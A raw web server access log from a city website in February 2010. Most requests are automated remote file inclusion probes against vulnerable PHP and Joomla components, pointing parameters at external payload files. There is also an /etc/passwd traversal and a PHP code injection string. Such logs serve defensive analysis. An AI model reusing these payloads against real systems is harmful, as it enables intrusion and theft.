85.233.162.101 - - [28/Feb/2010:18:24:32 -0800] "GET /lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [28/Feb/2010:18:24:32 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [28/Feb/2010:18:24:36 -0800] "GET /logs/access_090401.log/lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [28/Feb/2010:18:24:36 -0800] "GET /logs/access_090330.log/lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.249.65.134 - - [28/Feb/2010:18:24:49 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "cityofarkadelphia.com"
85.233.162.101 - - [28/Feb/2010:18:25:15 -0800] "GET /lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [28/Feb/2010:18:25:19 -0800] "GET /logs/access_090401.log/lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [28/Feb/2010:18:25:19 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [28/Feb/2010:18:25:19 -0800] "GET /logs/access_090330.log/lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:18:41:50 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:18:41:50 -0800] "GET /logs/access_091101.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:18:41:50 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:18:41:50 -0800] "GET /logs/access_090801.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
209.126.254.139 - - [28/Feb/2010:18:43:36 -0800] "GET /logs/access_090329.log/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
209.126.254.139 - - [28/Feb/2010:18:43:36 -0800] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
209.126.254.139 - - [28/Feb/2010:18:43:36 -0800] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
121.254.172.27 - - [28/Feb/2010:18:44:42 -0800] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
121.254.172.27 - - [28/Feb/2010:18:44:42 -0800] "GET /logs/access_090329.log/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
121.254.172.27 - - [28/Feb/2010:18:44:43 -0800] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.43.212.56 - - [28/Feb/2010:18:45:17 -0800] "GET /logs/access_090329.log/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.43.212.56 - - [28/Feb/2010:18:45:18 -0800] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.43.212.56 - - [28/Feb/2010:18:45:18 -0800] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.43.212.56 - - [28/Feb/2010:18:47:51 -0800] "GET /logs/access_091201.log/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:18:51:29 -0800] "GET /logs//becommunity/community/index.php?pageurl=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:18:51:29 -0800] "GET /becommunity/community/index.php?pageurl=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:18:51:29 -0800] "GET /logs/access_100101.log//becommunity/community/index.php?pageurl=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:18:52:17 -0800] "GET /logs/access_100101.log//becommunity/community/index.php?pageurl=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:18:52:17 -0800] "GET /logs//becommunity/community/index.php?pageurl=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:18:52:17 -0800] "GET /becommunity/community/index.php?pageurl=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:18:54:20 -0800] "GET /logs/access_100201.log//becommunity/community/index.php?pageurl=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:18:54:36 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:18:54:36 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:18:54:36 -0800] "GET /logs/access_091101.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:18:54:38 -0800] "GET /logs/access_081231.log//becommunity/community/index.php?pageurl=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:18:55:20 -0800] "GET /logs/access_100101.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:18:55:57 -0800] "GET /logs/access_100201.log//becommunity/community/index.php?pageurl=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.43.212.56 - - [28/Feb/2010:18:59:18 -0800] "GET /?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.43.212.56 - - [28/Feb/2010:18:59:18 -0800] "GET /logs/access_091101.log/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.43.212.56 - - [28/Feb/2010:18:59:18 -0800] "GET /logs/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 4227 "-" "Mozilla/5.0" "cityofarkadelphia.com"
207.46.199.50 - - [28/Feb/2010:18:59:26 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
207.46.199.50 - - [28/Feb/2010:19:00:44 -0800] "GET /Downloads/?N=D HTTP/1.1" 200 671 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
77.225.42.178 - - [28/Feb/2010:19:01:11 -0800] "GET /logs/access_090501.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "cityofarkadelphia.com"
77.225.42.178 - - [28/Feb/2010:19:01:12 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "cityofarkadelphia.com"
77.225.42.178 - - [28/Feb/2010:19:01:12 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "cityofarkadelphia.com"
77.225.42.178 - - [28/Feb/2010:19:01:13 -0800] "GET /logs/access_091031.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:19:02:52 -0800] "GET /logs/access_100101.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.225.42.178 - - [28/Feb/2010:19:03:05 -0800] "GET /logs/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "cityofarkadelphia.com"
77.225.42.178 - - [28/Feb/2010:19:03:10 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "cityofarkadelphia.com"
77.225.42.178 - - [28/Feb/2010:19:03:12 -0800] "GET /logs/access.log/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "cityofarkadelphia.com"
77.92.143.92 - - [28/Feb/2010:19:17:07 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.92.143.92 - - [28/Feb/2010:19:17:07 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.92.143.92 - - [28/Feb/2010:19:17:10 -0800] "GET /logs/access_091201.log///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.92.143.92 - - [28/Feb/2010:19:17:38 -0800] "GET /logs/access_091231.log///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
212.92.23.144 - - [28/Feb/2010:19:25:04 -0800] "GET /logs/access_090329.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
212.92.23.144 - - [28/Feb/2010:19:25:04 -0800] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
212.92.23.144 - - [28/Feb/2010:19:25:04 -0800] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
212.92.23.144 - - [28/Feb/2010:19:25:04 -0800] "GET /logs/access_091201.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
194.24.174.51 - - [28/Feb/2010:19:26:53 -0800] "GET /index.php?c=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "cityofarkadelphia.com"
194.24.174.51 - - [28/Feb/2010:19:26:53 -0800] "GET /index.php?c=./../../../../../../../../etc/passwd HTTP/1.0" 404 - "-" "-" "cityofarkadelphia.com"
77.92.143.92 - - [28/Feb/2010:19:34:30 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.92.143.92 - - [28/Feb/2010:19:34:30 -0800] "GET /logs/access_091231.log///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.92.143.92 - - [28/Feb/2010:19:34:30 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.47.237.17 - - [28/Feb/2010:19:34:50 -0800] "GET /logs/access_100101.log//include/mail.inc.php?skin_board_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.47.237.17 - - [28/Feb/2010:19:34:50 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.47.237.17 - - [28/Feb/2010:19:34:50 -0800] "GET /include/mail.inc.php?skin_board_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
187.116.133.27 - - [28/Feb/2010:19:38:30 -0800] "GET /logs/access.loghttp://viperbad.6te.net/gmail.txt? HTTP/1.1" 404 - "-" "Mozilla/3.0 (compatible; Indy Library)" "cityofarkadelphia.com"
187.116.133.27 - - [28/Feb/2010:19:38:30 -0800] "GET /logs/access_081231.loghttp://viperbad.6te.net/gmail.txt? HTTP/1.1" 404 - "-" "Mozilla/3.0 (compatible; Indy Library)" "cityofarkadelphia.com"
187.116.133.27 - - [28/Feb/2010:19:38:30 -0800] "GET /logs/access_091201.loghttp://viperbad.6te.net/gmail.txt? HTTP/1.1" 404 - "-" "Mozilla/3.0 (compatible; Indy Library)" "cityofarkadelphia.com"
187.116.133.27 - - [28/Feb/2010:19:38:30 -0800] "GET /logs/access_100201.loghttp://viperbad.6te.net/gmail.txt? HTTP/1.1" 404 - "-" "Mozilla/3.0 (compatible; Indy Library)" "cityofarkadelphia.com"
187.116.133.27 - - [28/Feb/2010:19:38:31 -0800] "GET /logs/access_091231.loghttp://viperbad.6te.net/gmail.txt? HTTP/1.1" 404 - "-" "Mozilla/3.0 (compatible; Indy Library)" "cityofarkadelphia.com"
187.116.133.27 - - [28/Feb/2010:19:38:31 -0800] "GET /logs/access_090401.loghttp://viperbad.6te.net/gmail.txt? HTTP/1.1" 404 - "-" "Mozilla/3.0 (compatible; Indy Library)" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:19:59:53 -0800] "GET /logs//main.php?appserv_root=http://paku1.fileave.com/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:19:59:53 -0800] "GET /logs/access_091001.log//main.php?appserv_root=http://paku1.fileave.com/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:19:59:53 -0800] "GET /main.php?appserv_root=http://paku1.fileave.com/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:20:00:15 -0800] "GET /main.php?appserv_root=http://paku1.fileave.com/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:20:00:15 -0800] "GET /logs//main.php?appserv_root=http://paku1.fileave.com/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:20:00:15 -0800] "GET /logs/access_091001.log//main.php?appserv_root=http://paku1.fileave.com/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.136.23.172 - - [28/Feb/2010:20:06:20 -0800] "GET /logs/access_081230.log//index.php?get=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.136.23.172 - - [28/Feb/2010:20:06:20 -0800] "GET /logs/access_090201.log//index.php?get=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.136.23.172 - - [28/Feb/2010:20:06:20 -0800] "GET /logs//index.php?get=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.136.23.172 - - [28/Feb/2010:20:06:20 -0800] "GET /index.php?get=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.25.99 - - [28/Feb/2010:20:08:46 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.kecschool.co.kr/upfiles/c055/tp??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "cityofarkadelphia.com"
222.122.25.99 - - [28/Feb/2010:20:08:51 -0800] "GET /logs/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.kecschool.co.kr/upfiles/c055/tp??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "cityofarkadelphia.com"
212.92.23.144 - - [28/Feb/2010:20:09:49 -0800] "GET /logs/access_090701.log//rwcards.advancedate.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
212.92.23.144 - - [28/Feb/2010:20:09:49 -0800] "GET /rwcards.advancedate.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
212.92.23.144 - - [28/Feb/2010:20:09:49 -0800] "GET /logs//rwcards.advancedate.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
212.92.23.144 - - [28/Feb/2010:20:10:44 -0800] "GET /logs/access_090201.log//rwcards.advancedate.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.133.62.73 - - [28/Feb/2010:20:13:01 -0800] "GET / HTTP/1.1" 200 917 "-" "Jakarta Commons-HttpClient/3.1-rc1" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:20:18:17 -0800] "GET /ashnews.php?pathtoashnews=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:20:18:17 -0800] "GET /logs/access_091001.log//ashnews.php?pathtoashnews=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:20:18:18 -0800] "GET /logs//ashnews.php?pathtoashnews=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:20:18:19 -0800] "GET /logs/access_090901.log//ashnews.php?pathtoashnews=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.208.78.90 - - [28/Feb/2010:20:19:27 -0800] "GET /?DOCUMENT_ROOT=http://www.westchesterinvisalign.com/baner.txt? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.208.78.90 - - [28/Feb/2010:20:19:27 -0800] "GET /logs/access_091031.log/?DOCUMENT_ROOT=http://www.westchesterinvisalign.com/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.208.78.90 - - [28/Feb/2010:20:19:27 -0800] "GET /logs/?DOCUMENT_ROOT=http://www.westchesterinvisalign.com/baner.txt? HTTP/1.1" 200 4227 "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:20:20:53 -0800] "GET /logs/access_091001.log//ashnews.php?pathtoashnews=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:20:20:53 -0800] "GET /ashnews.php?pathtoashnews=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:20:20:53 -0800] "GET /logs//ashnews.php?pathtoashnews=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:20:20:55 -0800] "GET /logs/access_090901.log//ashnews.php?pathtoashnews=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:20:21:26 -0800] "GET /ashnews.php?pathtoashnews=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:20:21:26 -0800] "GET /logs//ashnews.php?pathtoashnews=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:20:21:26 -0800] "GET /ashnews.php?pathtoashnews=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:20:21:26 -0800] "GET /logs//ashnews.php?pathtoashnews=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:20:21:36 -0800] "GET /logs/access_081231.log%20%20//ashnews.php?pathtoashnews=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.104.40.170 - - [28/Feb/2010:20:21:36 -0800] "GET /logs/access_081231.log%20%20//ashnews.php?pathtoashnews=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
186.28.232.13 - - [28/Feb/2010:20:21:55 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
186.28.232.13 - - [28/Feb/2010:20:21:55 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.190.166.35 - - [28/Feb/2010:20:22:39 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "cityofarkadelphia.com"
195.190.166.35 - - [28/Feb/2010:20:22:39 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "cityofarkadelphia.com"
186.28.232.13 - - [28/Feb/2010:20:24:32 -0800] "GET /logs/access_090330.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
212.92.23.144 - - [28/Feb/2010:20:24:35 -0800] "GET /param.peoplebook.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
212.92.23.144 - - [28/Feb/2010:20:24:35 -0800] "GET /logs/access_091231.log//param.peoplebook.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
212.92.23.144 - - [28/Feb/2010:20:24:35 -0800] "GET /logs//param.peoplebook.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
186.28.232.13 - - [28/Feb/2010:20:25:42 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.190.166.35 - - [28/Feb/2010:20:26:59 -0800] "GET /logs/access_090330.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "cityofarkadelphia.com"
195.190.166.35 - - [28/Feb/2010:20:27:51 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "cityofarkadelphia.com"
208.80.193.27 - - [28/Feb/2010:20:33:11 -0800] "GET / HTTP/1.0" 200 901 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; AT&T CSM6.0; AT&T CSM 6; .NET CLR 1.1.4322)" "cityofarkadelphia.com"
211.63.219.132 - - [28/Feb/2010:20:42:34 -0800] "GET /config/dbutil.bck.php?confdir=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.63.219.132 - - [28/Feb/2010:20:42:35 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.63.219.132 - - [28/Feb/2010:20:42:35 -0800] "GET /logs/access_100101.log//config/dbutil.bck.php?confdir=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
